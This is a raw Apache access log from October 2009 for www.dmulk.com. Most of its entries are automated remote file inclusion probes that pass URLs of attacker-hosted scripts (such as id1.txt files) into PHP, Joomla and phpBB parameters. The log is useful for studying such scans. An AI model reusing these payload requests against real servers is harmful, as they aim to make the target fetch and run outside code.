218.38.18.203 - - [30/Oct/2009:11:12:42 -0700] "GET /logs/access_090123.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:12:50 -0700] "GET /logs/access_080215.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:12:50 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:12:50 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:11:12:50 -0700] "GET /logs/access_081026.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:13:12 -0700] "GET /logs/access_080504.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:11:13:14 -0700] "GET /logs/access_080502.log//?path%5Bdocroot%5D=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
99.185.108.226 - - [30/Oct/2009:11:13:31 -0700] "GET /logs/access_080326.log HTTP/1.1" 200 2160964 "-" "aeGtsijm0kba0brrykpc0saf0blGplprrfjm" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:13:32 -0700] "GET /logs/access_080504.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.58.10 - - [30/Oct/2009:11:13:35 -0700] "GET /logs/access_080515.log//?path%5Bdocroot%5D=http://www.divasvip.com.mx/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.174.244.10 - - [30/Oct/2009:11:13:38 -0700] "GET /logs/access_090223.log%20%20/?sourcedir=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:13:49 -0700] "GET /logs/access_080504.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:14:05 -0700] "GET /includes/functions_mod_user.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:14:05 -0700] "GET /logs//includes/functions_mod_user.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:14:08 -0700] "GET /logs/access_080201.log//includes/functions_mod_user.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:14:12 -0700] "GET /logs/access_080504.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:14:15 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:14:15 -0700] "GET /logs/access_090515.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [30/Oct/2009:11:14:17 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:14:17 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15976 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:14:22 -0700] "GET /logs/access_090123.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:11:14:26 -0700] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:11:14:26 -0700] "GET /logs/access_080416.log%20%20/addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:11:14:26 -0700] "GET /addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:11:14:26 -0700] "GET /logs/access_080614.log%20%20/addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:14:27 -0700] "GET /logs/access_090408.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:14:27 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:14:27 -0700] "GET /logs/access_080504.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:14:28 -0700] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 15983 "-" "Mozilla/5.0" "www.dmulk.com"
63.174.244.10 - - [30/Oct/2009:11:14:28 -0700] "GET /logs/access_080518.log%20%20/?sourcedir=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:14:35 -0700] "GET /logs/access_090515.log%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:14:35 -0700] "GET /logs/access_090123.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:11:14:39 -0700] "GET /addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:11:14:39 -0700] "GET /logs/access_080416.log%20%20/addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:11:14:39 -0700] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:14:41 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:14:41 -0700] "GET /logs/access_090130.log/phphtml.php?htmlclass_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:14:42 -0700] "GET /phphtml.php?htmlclass_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:11:14:43 -0700] "GET /logs/access_080614.log%20%20/addons/guildbank/searcharrays.php?addonDir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:14:50 -0700] "GET /logs/access_090123.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:14:53 -0700] "GET /logs/access_080710.log/phphtml.php?htmlclass_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:15:18 -0700] "GET /bikes/dteel/1999_08/?S=A HTTP/1.0" 200 2085 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:15:20 -0700] "GET /bikes/dteel/2008_07_05/?M=A HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:15:23 -0700] "GET /logs/access_090123.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:15:25 -0700] "GET /logs/access_090123.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:15:29 -0700] "GET /logs/access_090520.log//ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:15:29 -0700] "GET /logs/access_090520.log//ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:15:29 -0700] "GET /ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:15:30 -0700] "GET /ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:15:30 -0700] "GET /logs//ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:15:31 -0700] "GET /logs//ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:15:44 -0700] "GET /logs/access_090527.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:11:15:48 -0700] "GET /logs/access_090223.log/?sourcedir=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:11:15:48 -0700] "GET /?sourcedir=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 200 16060 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:11:15:48 -0700] "GET /logs/?sourcedir=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 200 123783 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:16:00 -0700] "GET /logs/access_090123.log%20%20//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.62.136.226 - - [30/Oct/2009:11:16:24 -0700] "GET /logs/access_081230.log//board///?_server_path=http://apartment-manager-law.com/wsnlinks/y.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:16:47 -0700] "GET /logs/access_090213.log/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:16:48 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 123783 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:16:49 -0700] "GET /?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 16066 "-" "libwww-perl/5.812" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:16:53 -0700] "GET /logs/access_080416.log%20%20/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:16:53 -0700] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:16:53 -0700] "GET /addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:16:59 -0700] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:16:59 -0700] "GET /addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:16:59 -0700] "GET /logs/access_080416.log%20%20/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:11:17:08 -0700] "GET /logs/access_080518.log/?sourcedir=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:17:13 -0700] "GET /logs/access_090515.log//ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:17:16 -0700] "GET /logs/access_090402.log HTTP/1.0" 200 5411008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:17:17 -0700] "GET /logs/access_090822.log/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:17:17 -0700] "GET /?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 16065 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:17:17 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 123783 "-" "libwww-perl/5.812" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:17:20 -0700] "GET /logs/access_090515.log//ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:17:21 -0700] "GET /ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.136.177.137 - - [30/Oct/2009:11:17:22 -0700] "GET /ppa/inc/functions.inc.php?config[ppa_root_path]=' HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:17:29 -0700] "GET /logs/access_080614.log%20%20/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:11:17:30 -0700] "GET /logs/index.php?pag=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:11:17:30 -0700] "GET /logs/access_080507.log%20%20/index.php?pag=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:17:30 -0700] "GET /logs/access_090213.log/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:17:30 -0700] "GET /?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 16065 "-" "libwww-perl/5.79" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:11:17:31 -0700] "GET /index.php?pag=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 200 15914 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:17:32 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 123783 "-" "libwww-perl/5.79" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:17:37 -0700] "GET /logs/access_080614.log%20%20/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:17:39 -0700] "GET /header.php?wwwRoot=http://www.coselle.com/adminpanel/linksdir/joomla.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:17:40 -0700] "GET /logs//header.php?wwwRoot=http://www.coselle.com/adminpanel/linksdir/joomla.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.172.33.230 - - [30/Oct/2009:11:17:43 -0700] "GET /logs/access_081027.log/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
86.65.110.157 - - [30/Oct/2009:11:17:55 -0700] "GET /logs/access_080731.log%20%20/index.php?pag=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:17:55 -0700] "GET /bikes/dteel/WeSTOC08/ HTTP/1.0" 200 1245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:18:01 -0700] "GET /logs/access_090619.log HTTP/1.0" 200 3466172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:18:18 -0700] "GET /logs/access_090822.log/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:18:18 -0700] "GET /?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 16065 "-" "libwww-perl/5.79" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:18:18 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 200 123783 "-" "libwww-perl/5.79" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:19:02 -0700] "GET /logs/access_090130.log%20%20/phphtml.php?htmlclass_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.54.130 - - [30/Oct/2009:11:19:04 -0700] "GET /logs/access_080710.log%20%20/phphtml.php?htmlclass_path=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:11:19:16 -0700] "GET /logs/access_081027.log/?DOCUMENT_ROOT=http://www.pacificdxpedition.com/images/logs/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:19:39 -0700] "GET /logs/access_080921.log HTTP/1.0" 200 4979750 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:20:05 -0700] "GET /includes/archive/archive_topic.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:20:05 -0700] "GET /logs/includes/archive/archive_topic.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:20:05 -0700] "GET /logs/access_081008.log/includes/archive/archive_topic.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:20:08 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:20:08 -0700] "GET /logs/access_090807.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:20:08 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:20:10 -0700] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:20:10 -0700] "GET /addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:20:10 -0700] "GET /logs/access_080416.log/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:20:13 -0700] "GET /logs/access_090816.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:20:14 -0700] "GET /addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:20:14 -0700] "GET /logs/access_080416.log/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:11:20:15 -0700] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:20:29 -0700] "GET /bikes/dteel/2008_07_03/?S=A HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:11:20:30 -0700] "GET /logs/access_080331.log/includes/archive/archive_topic.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:20:41 -0700] "GET /logs/access_071201.log HTTP/1.0" 200 44753 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:20:55 -0700] "GET /logs/access_070712.log HTTP/1.0" 200 114624 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
79.148.238.69 - - [30/Oct/2009:11:20:55 -0700] "GET /logs/access_080816.log%20/administrator/index3.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:11:21:06 -0700] "GET /logs/access_070927.log HTTP/1.0" 200 42324 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:21:07 -0700] "GET /logs/access_081104.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:21:07 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:21:07 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:21:07 -0700] "GET /logs/access_081104.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:21:08 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 16047 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:11:21:08 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 200 16047 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.18.203 - - [30/Oct/2009:11:22:08 -0700] "GET /logs/access_080313.log//admin/classes/errors.php?error=http://family365.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
